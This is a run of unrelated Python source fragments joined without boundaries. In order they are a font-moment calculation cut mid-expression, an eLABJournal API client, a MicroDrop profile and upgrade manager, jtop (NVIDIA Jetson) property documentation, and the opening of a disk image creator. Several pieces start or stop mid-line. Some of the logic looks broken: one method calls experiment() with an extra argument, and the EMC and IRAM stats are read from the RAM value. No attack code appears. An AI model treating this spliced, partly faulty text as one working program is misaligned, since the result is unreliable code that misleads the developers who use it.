r70)/840 - y0*(r39 + 15*r43 + 12*r55 - r61*x1 + r62*x2 + r63)/840 self.momentXX += -r11*r73*(-r61 + y2)/9240 + r21*(r28 - r37*y1 + r44 + r78 + r79)/9240 + r22*(21*r26 - 630*r40 + 42*r41 - 126*r42 + r57*x3 + r82 + 210*r83 + 42*r84 - 14*r85)/9240 - r5*(r11*r62 + r14*r23 + 14*r15 - r76*y3 + 54*r86 - 84*r87 - r89 - r91)/9240 - r6*(27*r71 + 42*r72 + 70*r75 + r77)/9240 + 3*r71*y3/220 - 3*r72*y2/44 - r72*y3/4 + 3*r74*(r57 + r67)/3080 - r75*(378*y2 - 630*y3)/9240 + x0**3*(r57 + r62 + 165*y0 + y3)/660 + x0*(-18*r100 - r101*y0 - r101*y1 + r102*y2 - r103*y0 + r104*r20 + 63*r105 - 27*r106 - 9*r107 + r13 - r34*y0 - r76*y0 + 42*r87 + r92*y3 + r94*y3 + r95 - r97*y0 + 162*r98 - r99*y0)/9240 - y0*(135*r11*x1 + r14*r54 + r20*r93 + r33*x3 + 45*r71 + 14*r72 + 126*r74 + 42*r75 + r77 + r92*x3)/9240 self.momentXY += -r108*r14/18480 + r12*(r109 + 378*y3)/18480 - r14*r49/8 - 3*r14*r58/44 - r17*(252*r46 - 1260*r49)/18480 + r21*(18*r110 + r3*y1 + 15*r46 + 7*r49 + 18*r58)/18480 + r22*(252*r110 + 28*r112 + r113 + r114 + 2310*r53 + 30*r58 + 1260*r64 + 252*r65 + 42*r68 + r70)/18480 - r52*(r102 + 15*r11 + 7*r14)/18480 - r53*(r101 + r103 + r34 + r76 + r97 + r99)/18480 + r7*(-r115*r51 + r116 + 18*r117 - 18*r118 + 42*r119 - 15*r120 + 28*r45 + r81*y3)/18480 - r9*(63*r111 + 42*r15 + 28*r87 + r89 + r91)/18480 + x0*(r1*y0 + r104*r80 + r112*r54 + 21*r119 - 9*r120 - r122*r53 + r123 + 54*r124 + 60*r125 + 54*r126 + r127*r35 + r128*y3 - r129*x1 + 81*r130
None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(Experiments(self, "Experiments", "/api/v1/experiments", request, "experimentID", 5, self.experiment)) def studies(self, *args, **kwargs): """ Get object to access studies. Parameters (object) ---------------------- class: parser Pass the result of the first() method on this object instead class: project Filter by projectID of this object Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object sort : str, optional Sort by a specific field studyID : str, optional Filter by studyID search : str, optional Search experiments by name or contents projectID : str, optional Filter by projectID """ request = {"$sort": "studyID DESC"} kwargs_special = ["expand", "sort"] kwargs_keys = ["studyID", "search", "projectID"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) if isinstance(check_arg,Project): request["projectID"] = check_arg.id() else: raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(Studies(self,"Studies", "/api/v1/studies", request, "studyID", 5, self.study)) def study(self, id, **kwargs): """ Get study object with provided id. Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {"studyID": str(id)} kwargs_special = ["expand"] kwargs_keys = [] if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") rp = self._request("/api/v1/studies", "get", request) #check and get if (rp is not None) & isinstance(rp,dict) & ("data" in rp) & isinstance(rp["data"],list) & (len(rp["data"])==1): return(Study(self,rp["data"][0])) else: return(None) else: raise Exception("incorrect call") def storage_types(self, *args, **kwargs): """ Get object to access storageTypes. Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object sort : str, optional Sort by a specific field deviceType : str, optional Filter by the storage type's device type (STORAGE or EQUIPMENT) """ request = {} kwargs_special = ["expand", "sort"] kwargs_keys = ["deviceType"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(StorageTypes(self,"Storage Types", "/api/v1/storageTypes", request, "storageTypeID", 5, self.storage_type)) def storage_type(self, id): """ Get storage type object with provided id. """ if isinstance(id,numbers.Integral) | isinstance(id,str): rp = self._request("/api/v1/storageTypes/"+urllib.parse.quote(str(id)), "get", {}) #check and get if not(rp==None) & (type(rp) == dict): return(StorageType(self,rp)) else: return(None) else: raise Exception("incorrect call") def storage_layers(self, *args, **kwargs): """ Get object to access storageLayers. Parameters (object) ---------------------- class: parser Pass the result of the first() method on this object instead class: storage_layer Filter by storageLayerID of this object as parent class: storage Filter by storageID of this object Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object separate values with comma for multiple expands storage, location, storageLayers, samples, managers, reservations / allReservations sort : str, optional Sort by a specific field name : str, optional Filter by name barcodes : str, optional Filter by barcodes (comma-separated) parentStorageLayerID : str, optional Filter by parentStorageLayerID storageID : str, optional Filter by storageID """ request = {} kwargs_special = ["expand", "sort"] kwargs_keys = ["name","barcodes","parentStorageLayerID","storageID","deviceType"] if args is not None: for arg in args: check_arg = arg if isinstance(check_arg,eLABJournalPager): check_arg = arg.first(True) if isinstance(check_arg,Storage): request["storageID"] = check_arg.id() elif isinstance(check_arg,StorageLayer): request["parentStorageLayerID"] = check_arg.id() else: raise Exception("unsupported object '"+str(type(check_arg))+"'") if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") return(StorageLayers(self,"Storage Layers", "/api/v1/storageLayers", request, "storageLayerID", 5, self.storage_layer)) def storage_layer(self, id, **kwargs): """ Get storage layer object with provided id. Parameters (key/value) ---------------------- expand : str, optional Expand an ID field to an object separate values with comma for multiple expands storage, location, storageLayers, samples, managers, reservations / allReservations, statistics """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {} kwargs_special = ["expand"] kwargs_keys = [] if kwargs is not None: for key, value in kwargs.items(): if key in kwargs_special: request["$"+key] = value elif key in kwargs_keys: request[key] = value else: raise Exception("unsupported key '"+key+"'") rp = self._request("/api/v1/storageLayers/"+urllib.parse.quote(str(id)), "get", request) #check and get if not(rp==None) & (type(rp) == dict): return(StorageLayer(self,rp)) else: return(None) else: raise Exception("incorrect call") def experiment(self, id): """ Get experiment object with provided id. """ return(self._experiment(id,0)) def _experiment(self, id, page): """ Workaround to get experiment """ if isinstance(id,numbers.Integral) | isinstance(id,str): request = {"$page": int(page)} rp = self._request("/api/v1/experiments", "get", request) #check and get if not(rp==None) & (type(rp) == dict): if ("totalRecords" in rp.keys()) & ("maxRecords" in rp.keys()) & (rp["totalRecords"]>=1): maxPage = math.ceil(rp["totalRecords"]/rp["maxRecords"]) if "data" in rp.keys(): for dataItem in rp["data"]: if(dataItem["experimentID"]==id): return(Experiment(self, dataItem)) page+=1 if page < maxPage: return(self.experiment(id,page)) else: return(None) else: return(None) else: return(None) else: return(None) else: raise Exception("incorrect call") def section(self, section_id): """ Get section object with provided id. """ rp = self._request("/api/v1/experiments/sections/"+urllib.parse.quote(str(section_id)), "get", {}) #check and get if not(rp==None) & (type(rp) == dict): if "sectionType" in rp: section_type = str(rp["sectionType"]) if section_type == "PARAGRAPH": return(SectionParagraph(self,rp)) elif section_type == "COMMENT": return(SectionComment(self,rp)) elif section_type == "PROCEDURE": return(SectionProcedure(self,rp)) elif section_type == "DATATABLE": return(SectionDatatable(self,rp)) elif section_type == "CANVAS": return(SectionCanvas(self,rp)) elif section_type == "EXCEL": return(SectionExcel(self,rp)) elif section_type == "IMAGE": return(SectionImage(self,rp)) elif section_type == "FILE": return(SectionFile(self,rp)) elif section_type == "SAMPLESIN": return(SectionSample(self,rp)) elif section_type == "SAMPLESOUT": return(SectionSample(self,rp)) else: return(Section(self,rp)) else: raise Exception("no sectionType in response") else: return(None) def _request(self, location, method, request, key=None, show_messages=True, stream=False, headers=None): if not location.startswith("http"): request_location = self.__url+location else: request_location = location if key==None: key = self.__key try: request_headers = {"Accept": "application/json"} request_headers.update({"Authorization": key}) if not(headers==None): request_headers.update(headers) if method=="get": if isinstance(request,dict): data = request else: raise Exception("unsupported type of request") response = requests.get(request_location, params=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="post": if "Content-Type" in request_headers: data = request elif isinstance(request,str): request_headers.update({"Content-Type": "application/json"}) data = request elif isinstance(request,dict) | isinstance(request,int): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = requests.post(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="put": if isinstance(request,str) | isinstance(request,bytes): data = request elif isinstance(request,dict) | isinstance(request,int): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = requests.put(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="patch": if isinstance(request,str): request_headers.update({"Content-Type": "application/json"}) data = request elif isinstance(request,dict): request_headers.update({"Content-Type": "application/json"}) data = json.dumps(request) else: raise Exception("unsupported type of request") response = requests.patch(request_location, data=data, timeout=self.__timeout, headers=request_headers, stream=stream) elif method=="delete": if isinstance(request,dict): data = request else: raise Exception("unsupported type of request") response = requests.delete(request_location, params=data, timeout=self.__timeout, headers=request_headers, stream=stream) else: raise Exception("unsupported method") response.raise_for_status() #no content if response.status_code == 204: return(None) elif stream: return(response) else: try: return(json.loads(response.text)) except json.JSONDecodeError as decodeErr: print ("JSON Decode Error:",decodeErr) raise Exception("no (valid) response from eLABJournal") except requests.exceptions.HTTPError as httpErr: if show_messages: print ("Http Error:",httpErr) try: return(json.loads(response.text)) except json.JSONDecodeError as decodeErr: return(None) except requests.exceptions.ConnectionError as connErr: if show_messages: print ("Error Connecting:",connErr) return(None) except requests.exceptions.Timeout as timeOutErr: if show_messages: print ("Timeout Error:",timeOutErr) return(None) except requests.exceptions.RequestException as reqErr: if show_messages: print ("Something Else:",reqErr) return(None) raise Exception("no (valid) response from eLABJournal") def _create_methods(self, o): """
<gh_stars>0 import json import logging import os import pkg_resources import platform import re import subprocess as sp import sys import conda_helpers as ch import mpm import mpm.commands import mpm.bin import pandas as pd import path_helpers as ph import yaml try: import gtk except ImportError: GUI_AVAILABLE = False else: GUI_AVAILABLE = True from .config import create_config_directory from .microdrop_version import load_cached_version logger = logging.getLogger(__name__) cre_version = re.compile(r'^(?P<major>\d+)\.') get_major_version = lambda version: '{}.0'.format(cre_version .match(version) .group('major')) ICON_PATH = pkg_resources.resource_filename('microdrop', 'microdrop.ico') SAVED_COLUMNS = ['used_timestamp', 'path'] class VersionError(RuntimeError): pass def check_version_cache_for_upgrade(): ''' Prompt user to offer to upgrade if cached latest MicroDrop version is newer than currently installed version. .. versionadded:: 0.7.8 ''' # Get currently installed `microdrop` package information. # # Example `installed_info`: # # {u'base_url': None, # u'build_number': 0, # u'build_string': u'0', # u'channel': u'sci-bots', # u'dist_name': u'microdrop-2.10.2-0', # u'name': u'microdrop', # u'platform': None, # u'version': u'2.10.2', # u'with_features_depends': None} try: installed_info = ch.package_version('microdrop', verbose=False) except NameError: # Installed MicroDrop Conda package not found (perhaps this is a # development environment?) return cached_path, cached_info = load_cached_version() latest_version = cached_info.get('version') installed_version = installed_info.get('version') # If cached latest MicroDrop version is more recent than the currently # installed version, prompt user to offer to upgrade. if all([GUI_AVAILABLE, not cached_info.get('ignore'), latest_version is not None]): if (pkg_resources.parse_version(latest_version) <= pkg_resources.parse_version(installed_version)): return # Display dialog. dialog = gtk.MessageDialog(type=gtk.MESSAGE_QUESTION) dialog.set_icon_from_file(ICON_PATH) dialog.set_title('Upgrade to MicroDrop v{}'.format(latest_version)) dialog.add_buttons(gtk.STOCK_YES, gtk.RESPONSE_YES, "Not now", gtk.RESPONSE_NO, "Never", gtk.RESPONSE_CANCEL) dialog.set_markup('A new version of MicroDrop is available.\n\n' 'Would you like to upgrade to MicroDrop v{} (current' ' version: v{})?'.format(latest_version, installed_version)) response = dialog.run() dialog.destroy() if response == gtk.RESPONSE_CANCEL: # Ignore this specific version from now on. try: with cached_path.open('w') as output: cached_info = {'version': latest_version, 'ignore': True} yaml.dump(cached_info, stream=output) print ('new version available: MicroDrop v{} (not installing ' 'now)'.format(latest_version)) except: logger.error('Error caching latest version.', exc_info=True) elif response == gtk.RESPONSE_YES: # User selected `Yes`, so upgrade MicroDrop, but restrict upgrade # to within the same major version. try: major_version = int(cre_version.match(installed_version) .group('major')) install_log_json = ch.conda_exec('install', '--json', 'microdrop >={}, <{}' .format(major_version, major_version + 1)) install_response = json.loads(install_log_json) unlinked, linked = ch.install_info(install_response) print ch.format_install_info(unlinked, linked) try: # Remove stale cached MicroDrop version data. cached_path.remove() except: pass except: logger.error('Error upgrading MicroDrop.', exc_info=True) def load_profiles_info(profiles_path): ''' Load list of profiles from file. If file does not exist or list is empty, the profile list is initialized with the default profile directory path (creating a profile at the default location, if it does not already exist). .. versionchanged:: 0.1.post61 If profile already exists in the default profile path, but the profile does not match the MicroDrop major version, a default profile path is used that is specific to MicroDrop major version of the form ``MicroDrop-v<major_version>``. Parameters ---------- profiles_path : str Path to file containing list of profiles. Returns ------- df_profiles : pandas.DataFrame Table of MicroDrop profile descriptions including the columns: - ``path`` File system path to profile directory. - ``used_timestamp`` Most recent time that profile was launched. ''' profiles_path = ph.path(profiles_path) profiles_path.parent.makedirs_p() if profiles_path.exists(): with profiles_path.open('r') as input_: profiles_str = input_.read() try: profiles = [profile_i for profile_i in yaml.load(profiles_str) if ph.path(profile_i['path']).isdir()] except: logger.error('Error reading list of profiles from `%s`.', profiles_path, exc_info=True) profiles = [] else: profiles = [] default_profile_path = mpm.bin.get_plugins_directory().parent if default_profile_path.isdir(): try: # Verify default profile directory matches major MicroDrop version. verify_or_create_profile_version(default_profile_path) except VersionError: # Default profile path already exists, but profile does not match # MicroDrop major version. # Query the currently installed version of the MicroDrop Python package. installed_version_str = (pkg_resources .get_distribution('microdrop').version) major_version = get_major_version(installed_version_str) # Use default profile path specific to MicroDrop major version. default_profile_path = (default_profile_path.parent .joinpath('MicroDrop-v{}' .format(major_version))) if not profiles and not default_profile_path.isdir(): # No existing profiles. Create default profile. print ('No existing profiles. Create default profile at {}.' .format(default_profile_path)) create_config_directory(output_dir=default_profile_path) for sub_directory_i in ('devices', 'plugins'): default_profile_path.joinpath(sub_directory_i).makedirs_p() # Create a `RELEASE-VERSION` file and populate it with the installed # MicroDrop package version. release_version_path = default_profile_path.joinpath('RELEASE-VERSION') with release_version_path.open('w') as output: output.write(pkg_resources.get_distribution('microdrop').version) if GUI_AVAILABLE: major_version = installed_major_version() dialog = gtk.MessageDialog(type=gtk.MESSAGE_INFO) dialog.set_icon_from_file(ICON_PATH) dialog.set_title('New MicroDrop {} profile created' .format(major_version)) dialog.add_buttons(gtk.STOCK_OK, gtk.RESPONSE_OK) dialog.set_markup('No existing profiles for MicroDrop {}.\n\n' 'Created default profile at {}.' .format(major_version, default_profile_path)) dialog.run() dialog.destroy() if not profiles and default_profile_path.isdir(): # No profiles list found or empty profiles list. # # Use default profile path. profiles = [{'path': str(default_profile_path), 'used_timestamp': None}] df_profiles = pd.DataFrame(None, columns=SAVED_COLUMNS) df_profiles = import_profile(df_profiles, default_profile_path, parent=None) else: df_profiles = pd.DataFrame(profiles, columns=SAVED_COLUMNS) df_profiles.loc[df_profiles.used_timestamp == 'nan', 'used_timestamp'] = '' df_profiles.sort_values('used_timestamp', ascending=False, inplace=True) df_profiles.drop_duplicates(subset=['path'], inplace=True) return df_profiles def drop_version_errors(df_profiles, missing=False, mismatch=False, inplace=False): ''' Drop rows for profiles with version errors. Parameters ---------- df_profiles : pandas.DataFrame Table of MicroDrop profile descriptions. Must include *at least* the column ``path`` containing the file system path to each profile directory. missing : bool, optional If ``True``, drop rows for profiles where no ``RELEASE-VERSION`` file is found in the profile directory. mismatch : bool, optional If ``True``, drop rows for profiles where major version in ``RELEASE-VERSION`` file and major version of installed MicroDrop package **do not match**. inplace : bool, optional If ``True``, do operation inplace and return None. ''' def version_error(profile_path): try: verify_profile_version(profile_path) except VersionError: # Major version in `RELEASE-VERSION` file and major version of # installed MicroDrop package **do not match**. return mismatch except IOError: # No `RELEASE-VERSION` file found in the profile directory. return missing else: return False error_mask = df_profiles.path.map(version_error) result = df_profiles.drop(error_mask[error_mask].index, inplace=inplace) if inplace: return df_profiles else: return result def verify_profile_version(profile_path): ''' Parameters ---------- profile_path : str Path to profile directory. Raises ------ IOError If no version file found in profile directory. VersionError If profile version does not match installed MicroDrop version. ''' profile_path = ph.path(profile_path) release_version_path = profile_path.joinpath('RELEASE-VERSION') # Query the currently installed version of the MicroDrop Python package. installed_version_str = pkg_resources.get_distribution('microdrop').version installed_version = pkg_resources.parse_version(installed_version_str) if release_version_path.isfile(): # A `RELEASE-VERSION` file exists in the same directory as the # configuration file. # # Parse the version from the `RELEASE-VERSION` file. release_version_str = release_version_path.lines()[0] release_version = pkg_resources.parse_version(release_version_str) else: # No `RELEASE-VERSION` file found in the profile directory. raise IOError('No version file found in profile directory.') if not (get_major_version(release_version_str) == get_major_version(installed_version_str)): # Major version in `RELEASE-VERSION` file and major version of # installed MicroDrop package **do not match**. # # Notify the user and wait for user input to continue. raise VersionError('Configuration directory major version (%s) does ' 'not match installed major MicroDrop version (%s)' % (release_version, installed_version)) def verify_or_create_profile_version(profile_path): profile_path = ph.path(profile_path) try: verify_profile_version(profile_path) except IOError: # No `RELEASE-VERSION` file found in the profile directory. if GUI_AVAILABLE: # Prompt user to confirm profile version matches installed # MicroDrop version. dialog = gtk.MessageDialog(type=gtk.MESSAGE_QUESTION) dialog.set_icon_from_file(ICON_PATH) dialog.set_title('Confirm MicroDrop {} profile' .format(installed_major_version())) dialog.add_buttons(gtk.STOCK_YES, gtk.RESPONSE_YES, gtk.STOCK_NO, gtk.RESPONSE_NO) dialog.set_markup('Unable to determine compatible MicroDrop ' 'version from profile:\n\n {}\n\n' 'Was this profile created using the installed ' 'version of MicroDrop ({})?' .format(profile_path, installed_major_version())) label = (dialog.get_content_area().get_children()[0] .get_children()[-1].get_children()[0]) label.set_tooltip_text(profile_path) response = dialog.run() dialog.destroy() if response == gtk.RESPONSE_NO: raise VersionError('Not launching MicroDrop since profile was ' 'not created using the installed version of' ' MicroDrop ({})' .format(installed_major_version())) # Create a `RELEASE-VERSION` file and populate it with the installed # MicroDrop package version. release_version_path = profile_path.joinpath('RELEASE-VERSION') with release_version_path.open('w') as output: output.write(pkg_resources.get_distribution('microdrop').version) def environment_prompt(profile_path): ''' Launch command prompt window for Python environment, with environment variables set for MicroDrop profile and configuration paths (non-blocking). .. versionadded:: 0.1.post64 ''' profile_path = ph.path(profile_path) config_file = profile_path.joinpath('microdrop.ini') env = os.environ.copy() # Set environment variables for MicroDrop profile and configuration paths. env['MICRODROP_PROFILE'] = str(profile_path) env['MICRODROP_CONFIG'] = str(config_file) # Launch command prompt if platform.system() == 'Windows': if ch.conda_prefix() is not None: command = (r'start cmd "/K" {prefix}\Scripts\activate.bat {prefix}' .format(prefix=ch.conda_prefix())) else: command = r'start cmd' sp.call(command, shell=True, cwd=str(profile_path), env=env) else: raise RuntimeError('OS not currently supported: {}' .format(platform.system())) def launch_profile(profile_path): ''' 1. If cached latest MicroDrop version is newer than currently installed version, prompt user to offer to upgrade. 2. Launch MicroDrop using specified profile path. .. versionchanged:: 0.7.2 Launch MicroDrop in an **activated** Conda environment. Parameters ---------- profile_path : str File-system path to MicroDrop profile directory. Returns ------- int Exit code from MicroDrop program. ''' # Prompt user to upgrade MicroDrop
speed is the same that you have set in *jetson.fan.speed* :return: Status Fan :rtype: Fan :raises ValueError: Wrong speed number or wrong mode name """ return self._fan @property def nvpmodel(self): """ From this function you set and read NV Power Mode. If your NVIDIA Jetson does not use nvpmodel will return None If you want set a new nvpmodel you can follow the NVIDIA Jetson documentation and write a string like below .. code-block:: python # You can write a string for a name or an integer for the ID jetson.nvpmodel = name_or_id If you need to increase or decrease the ID you can use .. code-block:: python jetson.nvpmodel += 1 # or jetson.nvpmodel = jetson.nvpmodel + 1 There are other properties: * **name** - mode name * **id** - ID name * **modes** - A list with all mode available in your board * **status** - A list of status for each NVP model (False if the nvpmodel is in failure) * **is_running** - Status updating NVP model service The access of this properities is available like below .. code-block:: python # NVP model name print(jetson.nvpmodel.name) # NVP model id print(jetson.nvpmodel.id) # NVP model list print(jetson.nvpmodel.modes) # NVP model status print(jetson.nvpmodel.status) :return: Return the name of NV Power Mode :rtype: NVPModel or None :raises JtopException: if the nvp model does not exist* """ return self._nvp @nvpmodel.setter def nvpmodel(self, value): if self._nvp is None: return mode = self._nvp.set(value) # Do not send messages if nvpmodel is the same if mode == self._nvp.id: return # Send new nvpmodel self._controller.put({'nvp': mode}) @property def jetson_clocks(self): """ Status jetson_clocks, if you want change the jetson_clocks status you can simply write: .. code-block:: python jetson.jetson_clocks = value where *value* is a boolean value There are availabe other extra properties: * **boot** - You can enable and disable on boot **jetson_clocks** * **status** - A string with the current jetson_clocks status * *running* - The service is running * *booting* - jetson_clocks is in booting (When your board boot, jetson_clocks wait 60s before to start) * *activating* - jetson_clocks is activating * *deactivating* - jetson_clocks is deactivating You can change and edit using this property: .. code-block:: python # Read jetson_clocks boot property print(jetson.jetson_clocks.boot) # Set a new value jetson.jetson_clocks.boot = value # True or False Written jetson_clocks status .. code-block:: python # Status jetson_clocks print(jetson.jetson_clocks.status) :return: status jetson_clocks script :rtype: JetsonClocks :raises ValueError: Wrong jetson_clocks value """ return self._jc @jetson_clocks.setter def jetson_clocks(self, value): if not isinstance(value, bool): raise TypeError("Use a boolean") if not self._jc.is_config and not value: raise JtopException("I cannot set jetson_clocks.\nPlease shutdown manually jetson_clocks") # Check if service is not started otherwise skip if self._jc.status in ['booting', 'activating', 'deactivating']: return if value != self._jc.is_alive: # Send status jetson_clocks self._controller.put({'jc': {'enable': value}}) @property def stats(self): """ This property return a simplified version of tegrastats, it is simple to use if you want log the NVIDIA Jetson status with pandas or in a csv file. This property is a simplified version of all data collected from your NVIDIA Jetson, if you need more detailed information, please use the other jtop properties The field listed are: * **time** - A `datetime` variable with the local time in your board * **uptime** - A `timedelta` with the up time of your board, same from :func:`~jtop.jtop.jtop.uptime` * **jetson_clocks** - Status of jetson_clocks, human readable :func:`~jtop.jtop.jtop.jetson_clocks` * **nvp model** - If exist, the NV Power Model name active :func:`~jtop.jtop.jtop.nvpmodel` * **cpu X** - The status for each cpu in your board, if disabled you will read *OFF* * **GPU** - Status of your GPU :func:`~jtop.jtop.jtop.gpu` * **MTS FG** - Foreground tasks :func:`~jtop.jtop.jtop.mts` * **MTS BG** - Background tasks :func:`~jtop.jtop.jtop.mts` * **RAM** - Used ram :func:`~jtop.jtop.jtop.ram` * **EMC** - If exist, the used emc :func:`~jtop.jtop.jtop.emc` * **IRAM** - If exist, the used iram :func:`~jtop.jtop.jtop.iram` * **SWAP** - If exist, the used swap :func:`~jtop.jtop.jtop.swap` * **APE** - Frequency APE engine :func:`~jtop.jtop.jtop.engine` * **NVENC** - Frequency NVENC engine :func:`~jtop.jtop.jtop.engine` * **NVDEC** - Frequency NVDEC engine :func:`~jtop.jtop.jtop.engine` * **NVJPG** - Frequency NVJPG engine :func:`~jtop.jtop.jtop.engine` * **fan** - Status fan speed :func:`~jtop.jtop.jtop.fan` * **Temp X** - X temperature :func:`~jtop.jtop.jtop.temperature` * **power cur** - Total current power :func:`~jtop.jtop.jtop.power` * **power avg** - Total average power :func:`~jtop.jtop.jtop.power` :return: Compacts jetson statistics :rtype: dict """ stats = {'time': datetime.now(), 'uptime': self.uptime} # -- jetson_clocks -- if self.jetson_clocks is not None: stats['jetson_clocks'] = 'ON' if self.jetson_clocks else 'OFF' # -- NV Power Model -- if self.nvpmodel is not None: stats['nvp model'] = self.nvpmodel.name # -- CPU -- for cpu in sorted(self.cpu): stats[cpu] = self.cpu[cpu].get('val', 'OFF') # -- GPU -- stats['GPU'] = self.gpu['val'] # -- MTS -- if self.mts: stats['MTS FG'] = self.mts['fg'] stats['MTS BG'] = self.mts['bg'] # -- RAM -- stats['RAM'] = self.ram['use'] # -- EMC -- if self.emc: stats['EMC'] = self.ram['use'] # -- IRAM -- if self.iram: stats['IRAM'] = self.ram['use'] # -- SWAP -- if 'use' in self.swap: stats['SWAP'] = self.swap['use'] # -- Engines -- stats['APE'] = self.engine.ape['val'] stats['NVENC'] = self.engine.nvenc['val'] if self.engine.nvenc else 'OFF' stats['NVDEC'] = self.engine.nvdec['val'] if self.engine.nvdec else 'OFF' stats['NVJPG'] = self.engine.nvjpg['rate'] if self.engine.nvjpg else 'OFF' if self.engine.msenc: stats['MSENC'] = self.engine.msenc # -- FAN -- if self.fan: stats['fan'] = self.fan.measure # -- Temperature -- for temp in sorted(self.temperature): stats["Temp {name}".format(name=temp)] = self.temperature[temp] # -- Power -- total, _ = self.power stats['power cur'] = total['cur'] stats['power avg'] = total['avg'] return stats @property def swap(self): """ SWAP manager and reader If you want read the status of your board will return a dictionary with * **use** - Amount of SWAP in use * **tot** - Total amount of SWAP available for applications * **unit** - Unit SWAP, usually in MB * **cached** * **size** - Cache size * **unit** - Unit cache size This property has other extra methods show below * If you want know how many swap are active you can run this extra method .. code-block:: python all_swap = jetson.swap.all The output will be a dictionary, where for each swap: * **used** - Used Swap in kB * **size** - Size in kB * **type** - Type * **prio** - Priority * The method inside this property enable a new swap in your board. To work need to write a *size* in GB and if you want this swap enable in boot you can set *on_boot* on True (default False). This method will create a new swap located usually in **"/"** and called **"swfile"** .. code-block:: python jetson.swap.set(size, on_boot=False) * If you want disable the swap created you can run this method .. code-block:: python jetson.swap.deactivate() * This method will show the status of your SWAP created .. code-block:: python status = jetson.swap.is_enable * This method will show the current swap size created .. code-block:: python size = jetson.swap.size() * If you need to clear the cache in your NVIDIA Jetson you can run this extra call .. code-block:: python jetson.swap.clear_cache() :return: swap status :rtype: dict """ return self._swap @property def emc(self): """ EMC is the external memory controller, through which all sysmem/carve-out/GART memory accesses go. If your board have the EMC, the fields are: * **min_freq** - Minimum frequency in kHz * **max_freq** - Maximum frequency in kHz * **frq** - Running frequency in kHz * **val** - Status EMC, value between [0, 100] * **FreqOverride** - Status override :return: emc status :rtype: dict """ # Extract EMC return self._stats.get('emc', {}) @property def iram(self): """ IRAM is memory local to the video hardware engine. If your board have the IRAM, the fields are: * **use** - status iram used * **tot** - Total size IRAM * **unit** - Unit size IRAM, usually in kB * **lfb** - Largest Free Block (lfb) is a statistic about the memory allocator * **size** - Size of
<reponame>Ciantic/diskimgtools """ Disk Image Creator :author: <NAME> :license: MIT :version: 2019-07-28 """ DESCRIPTION = """ Disk Image Creator (.img) - Partitions and copies files to img file Source code: https://github.com/Ciantic/diskimgcreator ## Defining partitions Define partitions as directories, .tar or .tar.gz files. Then run this command with disk image file you want to create. You can define partitions in *short format* or *long format*. ### Short format `partitionNN[_msdos]_ENDPOS_TYPE[ .tar | .tar.gz ]` e.g.: * `partition01_8MiB_fat32` * `partition02_16GiB_ext4` Would define partition table as gpt (the default), create a 16GiB sized image file, where first partition ending at 8MiB and second partition ending at 16GiB. Beware with the permissions, especially if you use plain directory. In short format the first partition always is bootable and starts at 1MiB for optimal alignment of smaller images. *Notice*: Underscores in short format are optional, you may also use spaces. ### Long format You can also define partitions in *long format*, if you want to partition like it's 1947: `partitionNN [-- dd FULLSIZE] -- parted PARTEDCMD[ .tar | .tar.gz ]` e.g.: * `partition01 -- dd 256MiB -- parted mklabel msdos mkpart primary fat32 1 8MiB` * `partition02 -- parted mkpart primary ext4 8MiB 100%` Would create 256MiB sized image, with 7MiB fat32 partition and 248MiB ext4 partition. Consult parted manual for the scripting syntax. Full size used in initial dd is parsed only from the first partition. """ import uuid from typing import List, Optional import argparse import glob import sys import os import re import io import datetime import textwrap import subprocess import logging VERBOSE = False def _set_verbose(val: bool): global VERBOSE VERBOSE = val def _is_verbose(): global VERBOSE return VERBOSE def print_error(err: str): CRED = "\033[91m" CEND = "\033[0m" print(CRED + "Error: " + err + CEND, file=sys.stderr) def print_ok(ok: str): global VERBOSE CGREEN = "\33[32m" CEND = "\033[0m" if VERBOSE: print(CGREEN + ok + CEND) def print_notice(notice: str): global VERBOSE CBLUE2 = "\33[94m" CEND = "\033[0m" if VERBOSE: print(CBLUE2 + notice + CEND) class UnknownFilesystemException(Exception): def __init__(self, fstype: str): self.fstype = fstype class ImageFileExistsException(Exception): def __init__(self, imagefile: str): self.imagefile = imagefile class PartitionSizeParseException(Exception): def __init__(self, size: Optional[str] = None): self.size = size class PartitionsNotFoundException(Exception): pass class PartitionParseException(Exception): def __init__(self, filename: str): self.filename = filename class PartfsMountInUseException(Exception): def __init__(self, mountdir: str): self.mountdir = mountdir class Partfs: """ Mounts diskimage partitions as FUSE mounts """ def __init__(self, diskimage: str, mountdir: str): self.diskimage = diskimage self.mountdir = mountdir if not os.path.exists(mountdir): os.mkdir(mountdir) if os.listdir(mountdir): raise PartfsMountInUseException(mountdir) def __enter__(self): if not os.path.isdir(self.mountdir): os.mkdir(self.mountdir) try: subprocess.run( ["partfs", "-o", f"dev={self.diskimage}", self.mountdir], check=True ) except subprocess.CalledProcessError as err: print_error("Partfs failed.") raise err print_ok(f"Partfs {self.mountdir} mounted.") return sorted(glob.glob(os.path.join(self.mountdir, 